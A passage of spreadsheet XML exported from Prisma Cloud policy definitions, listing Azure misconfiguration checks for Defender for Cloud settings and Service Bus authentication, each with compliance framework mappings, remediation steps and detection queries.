      </c>
    </row>
    <row r="2407">
      <c r="A2407" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Brazilian Data Protection Law (LGPD), ISO 27002:2022, NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, NIST CSF v2.0, ISO 27002:2022, NIST CSF, NIST 800-53 Rev4, NIST 800-53 Rev 5, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), GDPR, HITRUST CSF v9.3 [Deprecated], TX-RAMP Level 2, NIST CSF, CSA CCM v3.0.1, APRA (CPS 234) Information Security, SOC 2, GDPR, NIST CSF, PCI DSS v3.2.1, CyberSecurity Law of the People's Republic of China, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev4, NIST CSF, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27001:2013, SOC 2, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, SOC 2, NIST CSF, MLPS 2.0 (Level 2), NIST CSF, HITRUST CSF v9.3 [Deprecated], NIST CSF, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev4, NIST CSF v2.0, SOC 2, CSA CCM v3.0.1, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), CSA CCM v3.0.1, ISO 27001:2013, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], CIS v1.1 (Azure), NYDFS 23 CRR-NY 500.0, NIST CSF, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, NIST CSF, NIST SP 800-171 Revision 3, NIST 800-53 Rev 5, CRI Profile v2.0, NIST CSF, CyberSecurity Law of the People's Republic of China, CSA CCM v3.0.1, NIST 800-53 Rev4, NIST CSF, NIST 800-53 Rev4, RBI Baseline Cyber Security and Resilience Requirements, NIST 800-53 Rev4, TX-RAMP Level 1, SOC 2, NIST CSF, APRA (CPS 234) Information Security, CSA CCM v3.0.1, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-171 Revision 2, ISO 27002:2022, CSA CCM v3.0.1, GDPR, CIS Controls v8, NIST CSF, NIST CSF, SOC 2, NIST CSF, HITRUST CSF v9.3 [Deprecated], NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO 27002:2022, TX-RAMP Level 2, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), NIST CSF, CIS Controls v8.1, NIST CSF, CRI Profile v1.2.1, NIST 800-53 Rev 5, Fedramp (Moderate), NIST SP 800-172, SOC 2, CSA CCM v3.0.1, MLPS 2.0 (Level 2), NIST CSF v2.0, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], ITSG-33, NIST 800-53 Rev 5, NIST 800-53 Rev4, Fedramp (Moderate), TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2407" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2407" s="2" t="inlineStr"/>
      <c r="D2407" t="inlineStr"/>
      <c r="E2407" t="inlineStr"/>
      <c r="F2407" t="inlineStr"/>
      <c r="G2407" t="b">
        <v>1</v>
      </c>
      <c r="H24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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2407" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2407" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud security contact phone number is not set</t>
        </is>
      </c>
      <c r="L2407" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2407" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2407" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2407" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2407" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2407" t="inlineStr">
        <is>
          <t>AU</t>
        </is>
      </c>
      <c r="R2407" t="inlineStr">
        <is>
          <t>AU-06-00 : Audit Record Review, Analysis, and Reporting</t>
        </is>
      </c>
      <c r="S2407" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2407" t="b">
        <v>0</v>
      </c>
      <c r="U2407" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2407" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2407" t="inlineStr">
        <is>
          <t>This policy identifies Subscriptions that are not set with security contact phone number for Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender). It is recommended to set security contact phone number to receive notifications when Microsoft Defender for Cloud detects compromised resources.</t>
        </is>
      </c>
      <c r="X2407" t="inlineStr">
        <is>
          <t>Use below Azure CLI example command to create new contact with phone number details for Azure Microsoft Defender for Cloud,
az security contact create -n "default1" --email 'john@contoso.com' --phone '214275-4038' --alert-notifications 'on' --alerts-admins 'on'
For more information:
https://docs.microsoft.com/en-us/cli/azure/security/contact?view=azure-cli-latest 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-3
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-3</t>
        </is>
      </c>
      <c r="Y2407" t="inlineStr"/>
      <c r="Z2407" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = (securityContacts is empty or securityContacts[?any(properties.phone is empty)] exists) and pricings[?any(properties.pricingTier equal ignore case Standard)] exists
{"category":"General","resourceTypes":["azurerm_security_center_contact"]}</t>
        </is>
      </c>
      <c r="AA2407" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2407" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2407" t="inlineStr">
        <is>
          <t>PC-AZR-SC-124-CKV_AZURE_20</t>
        </is>
      </c>
      <c r="AD2407" t="b">
        <v>1</v>
      </c>
      <c r="AE2407" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2407" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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7" t="inlineStr">
        <is>
          <t>e8799768-aeda-4d42-897a-29ede5798312</t>
        </is>
      </c>
      <c r="AI2407" t="inlineStr">
        <is>
          <t>51be4654-4d2d-43c4-9279-58bb38a1d741</t>
        </is>
      </c>
      <c r="AJ2407" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2407" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2408">
      <c r="A2408" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MTSBv2_Azure, kfirdaus AWS Account-CS, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v2.1.0 (Azure) Level 2, Azure Security Benchmark (v2), ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Azure Security Benchmark (v3), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, CIS v1.3.1 (Azure), CIS Controls v8, NIST CSF, Azure Security Benchmark (v2), Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, CIS v2.0.0 (Azure) Level 2, Insurance Regulatory And Development Authority Of India, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS v1.2.0 (Azure), ISO/IEC 27017:2015, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.1, ISO/IEC 27002:2013, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS v1.4.0 (Azure), ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of CIS v1.2.0 (Azure), HITRUST v.9.4.2 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019, CIS v1.3.0 (Azure), Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2408" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2408" s="2" t="inlineStr"/>
      <c r="D2408" t="inlineStr"/>
      <c r="E2408" t="inlineStr"/>
      <c r="F2408" t="inlineStr"/>
      <c r="G2408" t="b">
        <v>0</v>
      </c>
      <c r="H24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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2408" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2408" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud WDATP integration Disabled</t>
        </is>
      </c>
      <c r="L2408" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2408" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2408" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2408" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2408" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2408" t="inlineStr">
        <is>
          <t>Guidelines for Outsourcing</t>
        </is>
      </c>
      <c r="R2408" t="inlineStr">
        <is>
          <t>ISM-1570</t>
        </is>
      </c>
      <c r="S2408" t="inlineStr"/>
      <c r="T2408" t="b">
        <v>0</v>
      </c>
      <c r="U2408" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2408" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2408" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which has Microsoft Defender for Endpoint (WDATP) integration disabled. Enabling Microsoft Defender for Cloud provides the tools needed to harden your resources, track your security posture, protect against cyberattacks, and streamline security management. It is highly recommended to enable Microsoft Defender for WDATP.</t>
        </is>
      </c>
      <c r="X2408" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Click on the subscription name
5. Select the 'Integrations'
6. Check/Enable option 'Allow Microsoft Defender for Endpoint to access my data'
7. Select 'Save'</t>
        </is>
      </c>
      <c r="Y2408" t="inlineStr"/>
      <c r="Z2408" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = settings[?any( name equals WDATP and properties.enabled is false )] exists</t>
        </is>
      </c>
      <c r="AA2408" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2408" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2408" t="inlineStr">
        <is>
          <t>PC-AZR-SC-660</t>
        </is>
      </c>
      <c r="AD2408" t="b">
        <v>1</v>
      </c>
      <c r="AE2408" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2408" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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8" t="inlineStr">
        <is>
          <t>b7a63b07-551a-4813-82f5-f47b8428e0b3</t>
        </is>
      </c>
      <c r="AI2408" t="inlineStr">
        <is>
          <t>c1fffb8c-225e-41b3-a322-da19980fe593</t>
        </is>
      </c>
      <c r="AJ2408" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2408" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2409">
      <c r="A2409" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Brazilian Data Protection Law (LGPD), NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, NIST CSF v2.0, CIS v2.1.0 (Azure) Level 1, NIST CSF, NIST 800-53 Rev4, NIST 800-53 Rev 5, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), GDPR, HITRUST CSF v9.3 [Deprecated], TX-RAMP Level 2, NIST CSF, CSA CCM v3.0.1, APRA (CPS 234) Information Security, SOC 2, GDPR, Azure Security Benchmark (v2), NIST CSF, CIS v1.2.0 (Azure), PCI DSS v3.2.1, CyberSecurity Law of the People's Republic of China, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev4, NIST CSF, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, SOC 2, CSA CCM v3.0.1, SOC 2, NIST CSF, MLPS 2.0 (Level 2), NIST CSF, CIS v1.3.1 (Azure), HITRUST CSF v9.3 [Deprecated], NIST CSF, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, CIS Controls v8, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev4, NIST CSF v2.0, CIS v1.4.0 (Azure), SOC 2, CSA CCM v3.0.1, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), CSA CCM v3.0.1, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], NIST CSF, Insurance Regulatory And Development Authority Of India, NIST CSF, NIST SP 800-171 Revision 3, NIST 800-53 Rev 5, CRI Profile v2.0, NIST CSF, CyberSecurity Law of the People's Republic of China, ISO 27001:2013, CIS v1.5.0 (Azure) - Level 1, CSA CCM v3.0.1, NIST 800-53 Rev4, NIST CSF, HIPAA, NIST 800-53 Rev4, HITRUST CSF v.11.2.0, NIST 800-53 Rev4, SOC 2, NIST CSF, APRA (CPS 234) Information Security, Azure Security Benchmark (v3), CSA CCM v3.0.1, SOC 2, ACSC Information Security Manual (ISM), NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, NIST SP 800-171 Revision 2, CSA CCM v3.0.1, GDPR, NIST CSF, NIST CSF, SOC 2, NIST CSF, HITRUST CSF v9.3 [Deprecated], NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, NIST CSF, CIS v1.1 (Azure), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS Controls v8.1, TX-RAMP Level 2, CSA CCM v3.0.1, CSA CCM v3.0.1, CIS v1.3.0 (Azure), Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), NIST CSF, CIS Controls v7.1, NIST CSF, CIS v2.0.0 (Azure) Level 1, NIST 800-53 Rev 5, Fedramp (Moderate), Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, SOC 2, CSA CCM v3.0.1, MLPS 2.0 (Level 2), NIST CSF v2.0, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], ITSG-33, NIST 800-53 Rev 5, NIST 800-53 Rev4, Fedramp (Moderate), TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2409" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2409" s="2" t="inlineStr"/>
      <c r="D2409" t="inlineStr"/>
      <c r="E2409" t="inlineStr"/>
      <c r="F2409" t="inlineStr"/>
      <c r="G2409" t="b">
        <v>1</v>
      </c>
      <c r="H24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09" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2409" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2409" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud email notification for subscription owner is not set</t>
        </is>
      </c>
      <c r="L2409" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2409" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2409" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2409" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2409" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2409" t="inlineStr">
        <is>
          <t>AU</t>
        </is>
      </c>
      <c r="R2409" t="inlineStr">
        <is>
          <t>AU-06-00 : Audit Record Review, Analysis, and Reporting</t>
        </is>
      </c>
      <c r="S2409" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2409" t="b">
        <v>0</v>
      </c>
      <c r="U2409" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2409" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2409" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) in which email notification for subscription owners is not set. Enabling security alert emails to subscription owners ensures that they receive security alert emails from Microsoft. This ensures that they are aware of any potential security issues and can mitigate the risk in a timely fashion.</t>
        </is>
      </c>
      <c r="X2409" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Click on the subscription name
5. Click on 'Email notifications'
6. In the drop down of the 'All users with the following roles' field select 'Owner'
7. Select 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-5
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-5</t>
        </is>
      </c>
      <c r="Y2409" t="inlineStr"/>
      <c r="Z2409" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = (securityContacts is empty or securityContacts[*].properties.email is empty or securityContacts[*].properties.alertsToAdmins equal ignore case Off) and pricings[?any(properties.pricingTier equal ignore case Standard)] exists
{"category":"General","resourceTypes":["azurerm_security_center_contact"]}</t>
        </is>
      </c>
      <c r="AA2409" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2409" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2409" t="inlineStr">
        <is>
          <t>PC-AZR-SC-128-CKV_AZURE_22</t>
        </is>
      </c>
      <c r="AD2409" t="b">
        <v>1</v>
      </c>
      <c r="AE2409" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2409" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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09" t="inlineStr">
        <is>
          <t>fc914428-2c9a-4240-a3a7-769b85187278</t>
        </is>
      </c>
      <c r="AI2409" t="inlineStr">
        <is>
          <t>acc69a5f-d633-4a07-8697-c1ec2344788e</t>
        </is>
      </c>
      <c r="AJ2409" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2409" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2410">
      <c r="A2410" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, CIS v2.1.0 (Azure) Level 2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, CSA CCM v4.0.12, kfirdaus AWS Account-CS, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v1.2.0 (Azure), CIS v2.0.0 (Azure) Level 2, Copy of CIS v1.2.0 (Azure), CIS v1.3.0 (Azure), ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Azure Security Benchmark (v3), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Insurance Regulatory And Development Authority Of India, ISO/IEC 27002:2013, CIS v1.3.1 (Azure), PCI DSS v3.2.1, ISO/IEC 27002:2013, CSA CCM v4.0.12, ISO/IEC 27017:2015, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v4.0.12, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, ACSC Information Security Manual (ISM), HITRUST v.9.4.2 [Deprecated], CIS v1.4.0 (Azure), Azure Security Benchmark (v2), Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, CSA CCM v4.0.12, ISO/IEC 27002:2013, CIS v1.5.0 (Azure) - Level 2, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, MTSBv2_Azure, ISO/IEC 27018:2019, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2410" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2410" s="2" t="inlineStr"/>
      <c r="D2410" t="inlineStr"/>
      <c r="E2410" t="inlineStr"/>
      <c r="F2410" t="inlineStr"/>
      <c r="G2410" t="b">
        <v>1</v>
      </c>
      <c r="H24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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2410" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2410" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud is set to Off for Key Vault</t>
        </is>
      </c>
      <c r="L2410" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2410" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2410" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2410" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2410" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2410" t="inlineStr">
        <is>
          <t>Security Center</t>
        </is>
      </c>
      <c r="R2410" t="inlineStr">
        <is>
          <t>2.8</t>
        </is>
      </c>
      <c r="S2410" t="inlineStr"/>
      <c r="T2410" t="b">
        <v>0</v>
      </c>
      <c r="U2410" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2410" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2410" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which has defender setting for Key Vault is set to Off. Enabling Microsoft Defender for Cloud provides the tools needed to harden your resources, track your security posture, protect against cyberattacks, and streamline security management. It is highly recommended to enable Microsoft Defender for Key Vault.</t>
        </is>
      </c>
      <c r="X2410" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Click on the subscription name
5. Select the 'Defender plans'
6. Select 'Enable all Microsoft Defender for Cloud plans' if not already enabled
7. On the line in the table for 'Key Vault' Select 'On' under Plan.
8. Select 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-key-vault
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-key-vault</t>
        </is>
      </c>
      <c r="Y2410" t="inlineStr"/>
      <c r="Z2410" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any( name equals KeyVaults and properties.pricingTier does not equal Standard)] exists
{"category":"General","resourceTypes":["azurerm_security_center_subscription_pricing"]}</t>
        </is>
      </c>
      <c r="AA2410" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2410" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2410" t="inlineStr">
        <is>
          <t>PC-AZR-SC-644-CKV_AZURE_87</t>
        </is>
      </c>
      <c r="AD2410" t="b">
        <v>1</v>
      </c>
      <c r="AE2410" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2410" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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0" t="inlineStr">
        <is>
          <t>9706338d-291b-4937-be1e-752e251ac5a7</t>
        </is>
      </c>
      <c r="AI2410" t="inlineStr">
        <is>
          <t>c73d5998-dfa1-4978-a34b-0a48a47c2dce</t>
        </is>
      </c>
      <c r="AJ2410" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2410" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2411">
      <c r="A2411" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ITSG-33, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2022.2.1</t>
        </is>
      </c>
      <c r="B2411" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2411" s="2" t="inlineStr"/>
      <c r="D2411" t="inlineStr"/>
      <c r="E2411" t="inlineStr"/>
      <c r="F2411" t="inlineStr"/>
      <c r="G2411" t="b">
        <v>1</v>
      </c>
      <c r="H24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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2411" t="inlineStr">
        <is>
          <t>azure-service-bus</t>
        </is>
      </c>
      <c r="K2411" t="inlineStr">
        <is>
          <t>Azure Service bus namespace not configured with Azure Active Directory (Azure AD) authentication</t>
        </is>
      </c>
      <c r="L2411" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2411" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2411" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2411" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2411" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2411" t="inlineStr">
        <is>
          <t>Identification &amp; Authentication</t>
        </is>
      </c>
      <c r="R2411" t="inlineStr">
        <is>
          <t>IAC-01</t>
        </is>
      </c>
      <c r="S2411" t="inlineStr"/>
      <c r="T2411" t="b">
        <v>0</v>
      </c>
      <c r="U2411" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2411" t="inlineStr">
        <is>
          <t>azure-service-bus-namespace</t>
        </is>
      </c>
      <c r="W2411" t="inlineStr">
        <is>
          <t>This policy identifies Service bus namespaces that are not configured with Azure Active Directory (Azure AD) authentication and are enabled with local authentication. Azure AD provides superior security and ease of use over shared access signatures (SAS). With Azure AD, there's no need to store the tokens in your code and risk potential security vulnerabilities. It is recommended to configure the Service bus namespaces with Azure AD authentication so that all actions are strongly authenticated.</t>
        </is>
      </c>
      <c r="X2411" t="inlineStr">
        <is>
          <t>To configure Azure Active Directory (Azure AD) authentication and disable local authentication on existing Service bus, follow below URL instructions:
https://docs.microsoft.com/en-us/azure/service-bus-messaging/disable-local-authentication</t>
        </is>
      </c>
      <c r="Y2411" t="inlineStr"/>
      <c r="Z2411" t="inlineStr">
        <is>
